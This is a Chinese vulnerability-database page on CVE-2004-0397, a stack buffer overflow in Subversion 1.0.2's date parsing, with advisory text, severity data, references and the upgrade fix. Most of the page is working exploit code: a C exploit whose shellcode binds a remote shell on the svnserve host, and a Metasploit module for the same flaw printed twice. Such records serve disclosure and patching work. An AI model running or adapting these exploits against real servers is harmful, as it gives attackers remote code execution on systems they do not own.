CVE-2004-0397
CVSS7.5
发布时间 :2004-07-07 00:00:00
修订时间 :2016-10-17 22:45:00
NMCOEPS    

[原文]Stack-based buffer overflow during the apr_time_t data conversion in Subversion 1.0.2 and earlier allows remote attackers to execute arbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev svn-protocol command.


[CNNVD]Subversion日期解析函数缓冲区溢出漏洞(CNNVD-200407-009)

        
        Subversion是一款版本控制系统。
        Subversion没有正确检查处理用户提交的请求数据,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。
        当Subversions尝试转换字符串给apr_time_t函数时,会采用sscanf()函数来解码旧格式的日期字符串,由于对参数缺少充分检查,提交超长格式串数据可能触发缓冲区溢出。远程攻击者可以通过DAV2 REPORT查询或get-dated-rev svn-protocol命令来触发,精心构建提交数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:subversion:subversion:1.0
cpe:/a:subversion:subversion:1.0.2
cpe:/a:subversion:subversion:1.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0397
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-009
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021737.html
(UNKNOWN)  FULLDISC  20040519 Advisory 08/2004: Subversion remote vulnerability
http://marc.info/?l=bugtraq&m=108498676517697&w=2
(UNKNOWN)  BUGTRAQ  20040519 Advisory 08/2004: Subversion remote vulnerability
http://security.e-matters.de/advisories/082004.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/082004.html
http://subversion.tigris.org/svn-sscanf-advisory.txt
(UNKNOWN)  CONFIRM  http://subversion.tigris.org/svn-sscanf-advisory.txt
http://www.gentoo.org/security/en/glsa/glsa-200405-14.xml
(UNKNOWN)  GENTOO  GLSA-200405-14
http://www.linuxsecurity.com/advisories/fedora_advisory-4373.html
(VENDOR_ADVISORY)  FEDORA  FEDORA-2004-128
http://www.securityfocus.com/archive/1/363814
(VENDOR_ADVISORY)  BUGTRAQ  20040519 [OpenPKG-SA-2004.023] OpenPKG Security Advisory (subversion)
http://www.securityfocus.com/bid/10386
(VENDOR_ADVISORY)  BID  10386
http://xforce.iss.net/xforce/xfdb/16191
(VENDOR_ADVISORY)  XF  subversion-date-parsing-command-execution(16191)
https://bugzilla.fedora.us/show_bug.cgi?id=1748
(UNKNOWN)  FEDORA  FLSA:1748

- 漏洞信息

Subversion日期解析函数缓冲区溢出漏洞
高危 边界条件错误
2004-07-07 00:00:00 2005-10-20 00:00:00
远程  
        
        Subversion是一款版本控制系统。
        Subversion没有正确检查处理用户提交的请求数据,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。
        当Subversions尝试转换字符串给apr_time_t函数时,会采用sscanf()函数来解码旧格式的日期字符串,由于对参数缺少充分检查,提交超长格式串数据可能触发缓冲区溢出。远程攻击者可以通过DAV2 REPORT查询或get-dated-rev svn-protocol命令来触发,精心构建提交数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Subversion
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Subversion Upgrade 1.0.3
        
        http://subversion.tigris.org/project_packages.html

- 漏洞信息 (304)

Subversion 1.0.2 svn_time_from_cstring() Remote Exploit (EDBID:304)
linux remote
2004-06-25 Verified
3690 Gyan Chawdhary
N/A [点击下载]
/* subversion-1.0.2 exploit by Gyan Chawdhary ... 
* exploits a stack overflow in the svn_time_from_cstring() function. We build
* a date format which is valid but at the same time exits after the sscanf 
* function, or else it branches into another function which segfaults at the
* apr_pool_t *pool. We overwrite our eip with a pointer to the main *data 
* buffer stored in the heap where our shell code is stored in the main request
* itself. This is cause the local stack space for svn_time_from_cstring is 
* small. Will bind a shell on 36864 port. Modify it for ur own usage. 
*
* boring exploit for a boring vulnerability 
* Gyan
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

#define BUF_SIZE ( 1024 * 2 )
#define TRUE 1
#define FALSE 0
#define PORT 3690 /* Default svnserve Port */
#define IP "127.0.0.1"
#define CMD "/bin/uname -a ; id ;\r\n";

struct targets {
char *os;
unsigned int *eip;
unsigned int *shell_nop;
};

/*struct targets TARGETS[] =
{
{ "Redhat 8.0 - (Psyche)", 
*/ 
char offset1[] = "\x78\x32\x06\x08"; // 0x8063278 + 88 + 12;
char offset2[] = "\xdc\x32\x06\x08"; // 0x80632dc

int sockfd;

char request1[] = "( 2 ( edit-pipeline ) %d:%s )\n";

char request2[] = "( ANONYMOUS ( 0: ) )\n";

char request3[] = "( get-dated-rev ( 314:aaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%saaaaaaaa%saaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 4 a tttt 16:24:23.111 (day 277, dst 1, gmt_off -18000) ) )\n";

char request4[] = "( check-path ( 0: ( 0 ) ) )\n";


/* p_types */
void xp_connect(char *);
char *build_request(char *);
void talk(char *, char *);


char shellcode[] = 
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";


void xp_connect(char *ip)
{
// int sockfd;
struct sockaddr_in s;
char buffer[1024];
char temp[1024];
int tmp;

s.sin_family = AF_INET;
s.sin_port = htons(PORT);
s.sin_addr.s_addr = inet_addr(IP);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Cannot create socket\n");
exit(-1);
}

if((connect(sockfd,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
{
printf("Cannot connect()\n");
exit(-1);
}
memset(temp, '\0', sizeof(temp));
tmp = recv(sockfd,temp,1024,0);

}

void talk(char *ip, char *repo)
{
char buffer[1024], request[1024], tmp[512];
static char string[] = "svn://%s/%s";
int size;
char *str;

sprintf(buffer, string, ip, repo);
size = strlen(buffer);
sprintf(request, request1, size, buffer);

xp_connect(ip);

if (send(sockfd, request, strlen(request), 0) < 0)
{
printf("send() failed\n");
exit(-1);
}
recv(sockfd, tmp, 512, 0);

if (send(sockfd, request2, strlen(request2), 0) < 0)
{
printf("send() failed\n");
exit(-1);
}
recv(sockfd, tmp, 512, 0);

str = build_request(shellcode);

if(write (sockfd, str, strlen(str)) < 0)
{
printf("write() failed\n");
exit(-1);
}

close(sockfd);
//connect_target();
}



char *build_request(char *sc)
{
char *buffer, *ptr;
buffer = (char *)malloc(1024);
ptr = buffer;
sprintf(ptr, request3, offset1, offset2, sc);

return buffer;
}



main(int argc, char **argv)
{
talk(IP, "cool");
}

// milw0rm.com [2004-06-25]
		

- 漏洞信息 (16284)

Subversion Date Svnserve (EDBID:16284)
unix dos
2010-08-07 Verified
0 metasploit
N/A [点击下载]
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http/client'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Subversion Date Svnserve',
			'Description'    => %q{
					This is an exploit for the Subversion date parsing overflow.  This
				exploit is for the svnserve daemon (svn:// protocol) and will not work
				for Subversion over webdav (http[s]://).  This exploit should never
				crash the daemon, and should be safe to do multi-hits.

				**WARNING** This exploit seems to (not very often, I've only seen
				it during testing) corrupt the subversion database, so be careful!
			},
			'Author'         => 'spoonm',
			'Version'        => '$Revision: 9971 $',
			'References'     =>
				[
					['CVE', '2004-0397'],
					['OSVDB', '6301'],
					['BID',	'10386'],
					['URL',   'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
					['MIL',   '68'],
				],
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
					'MinNops'  => 16,
				},
			'SaveRegisters'  => [ 'esp' ],
			'Arch'           => 'x86',
			'Platform'       => [ 'linux', 'bsd' ],
			'Targets'        =>
				[
					[
						'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbffffe13 },
									'Stop'  => { 'Ret' => 0xbfff0000 },
									'Step'  => 0
								}
						},
					],
					[
						'FreeBSD Bruteforce',
						{
							'Platform'   => 'bsd',
							'Bruteforce' =>
								{
									'Start' => { 'Ret' => 0xbfbffe13 },
									'Stop'  => { 'Ret' => 0xbfbf0000 },
									'Step'  => 0
								}
						},
					],

				],
			'DisclosureDate' => 'May 19 2004'))

		register_options(
			[
				Opt::RPORT(3690),
				OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
			], self.class)

		register_advanced_options(
			[
				# 62 on spoonm's, 88 on HD's
				OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
				OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
			], self.class)
	end

	def check
	end

	def brute_exploit(addresses)
		connect

		print_status("Trying #{"%.8x" % addresses['Ret']}...")

		buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded

		[
			"( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
			"( ANONYMOUS ( 0; ) )",
			"( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
		].each_with_index { |buf, index|
			trash = sock.get_once

			print_line("Received: #{trash}") if debugging?

			if (sock.put(buf) || 0) == 0 and index < 3
				print_error("Error transmitting buffer.")
				raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
			end

			if index == 3 and trash.length > 0
				print_error("Received data when we shouldn't have")
				raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
			end
		}

		handler
		disconnect
	end

	def lengther(buf)
		"#{buf.length}:" + buf
	end

end
		

- 漏洞信息 (F82288)

Subversion Date Overflow (PacketStormID:F82288)
2009-10-28 00:00:00
spoonm  
exploit,web,overflow,protocol
CVE-2004-0397
[点击下载]

This is a Metasploit exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/http'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Brute
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Subversion Date Svnserve',
			'Description'    => %q{
      This is an exploit for the Subversion date parsing overflow.  This
      exploit is for the svnserve daemon (svn:// protocol) and will not work
      for Subversion over webdav (http[s]://).  This exploit should never
      crash the daemon, and should be safe to do multi-hits.

      **WARNING** This exploit seems to (not very often, I've only seen
      it during testing) corrupt the subversion database, so be careful!
			},
			'Author'         => 'spoonm',
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	['CVE', '2004-0397'],
					['OSVDB', '6301'],
					['BID',	'10386'],
					['URL',   'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
					['MIL',   '68'],
				],
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
					'MinNops'  => 16,
				},	
			'SaveRegisters'  => [ 'esp' ],
			'Arch'           => 'x86',
			'Platform'       => [ 'linux', 'bsd' ],
			'Targets'        => 
				[
					[ 
						'Linux Bruteforce',
						{
							'Platform'   => 'linux',
							'Bruteforce' => 
								{
									'Start' => { 'Ret' => 0xbffffe13 },
									'Stop'  => { 'Ret' => 0xbfff0000 },
									'Step'  => 0
								}
						},
					],
					[ 
						'FreeBSD Bruteforce',
						{
							'Platform'   => 'bsd',
							'Bruteforce' => 
								{
									'Start' => { 'Ret' => 0xbfbffe13 },
									'Stop'  => { 'Ret' => 0xbfbf0000 },
									'Step'  => 0
								}
						},
					],

				],
			'DisclosureDate' => 'May 19 2004'))

		register_options(
			[
				Opt::RPORT(3690),	
				OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
			], self.class)
	
		register_advanced_options(
			[
				# 62 on spoonm's, 88 on HD's
				OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
				OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
			], self.class)
	end

	def check
	end

	def brute_exploit(addresses)
		connect
		
		print_status("Trying #{"%.8x" % addresses['Ret']}...")

		buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded
		
		[
			"( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
			"( ANONYMOUS ( 0; ) )",
			"( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
		].each_with_index { |buf, index|
			trash = sock.get_once

			print_line("Received: #{trash}") if debugging?
			
			if (sock.put(buf) || 0) == 0 and index < 3
				print_error("Error transmitting buffer.")
				raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
			end

			if index == 3 and trash.length > 0
				print_error("Received data when we shouldn't have")
				raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
			end
		}

		handler
		disconnect
	end

	def lengther(buf)
		"#{buf.length}:" + buf
	end

end

    

- 漏洞信息

6301
Subversion (SVN) apr_time_t data Conversion Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Subversion. The Subversion fails to check the boundary when calling sscanf() to decode old-styled date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.

- 时间线

2004-05-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Subversion Date Parsing Function Buffer Overflow Vulnerability
Boundary Condition Error 10386
Yes No
2004-05-19 12:00:00 2007-10-17 03:07:00
This issue was discovered by Stefan Esser <s.esser@ematters.de>.

- 受影响的程序版本

Subversion Subversion 1.0.2
Subversion Subversion 1.0.1
+ Conectiva Linux 10.0
Subversion Subversion 1.0
Gentoo Linux 1.4
Subversion Subversion 1.0.3

- 不受影响的程序版本

Subversion Subversion 1.0.3

- 漏洞讨论

Subversion is prone to a buffer-overflow vulnerability that resides in one of its data-parsing functions. Specifically, Subversion calls an 'sscanf()' function when converting data strings to different formats. As a result, the software copies user-supplied data into an unspecified buffer without proper boundary checks.

Subversion 1.0.2 and prior versions are prone to this issue.

- 漏洞利用

The following exploits are available:

- 解决方案

Subversion 1.0.3 has been released to address this issue. Please see the references for more information.


Subversion Subversion 1.0

Subversion Subversion 1.0.1

Subversion Subversion 1.0.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站